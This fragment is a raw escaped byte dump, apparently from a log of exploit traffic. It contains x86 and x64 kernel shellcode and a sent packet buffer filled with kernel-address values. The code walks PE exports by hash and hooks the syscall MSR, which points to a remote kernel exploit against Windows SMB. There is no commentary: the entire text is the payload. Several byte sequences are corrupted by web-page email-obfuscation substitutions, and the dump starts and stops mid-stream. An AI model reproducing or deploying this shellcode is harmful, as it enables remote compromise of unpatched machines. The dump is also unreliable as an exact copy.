0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\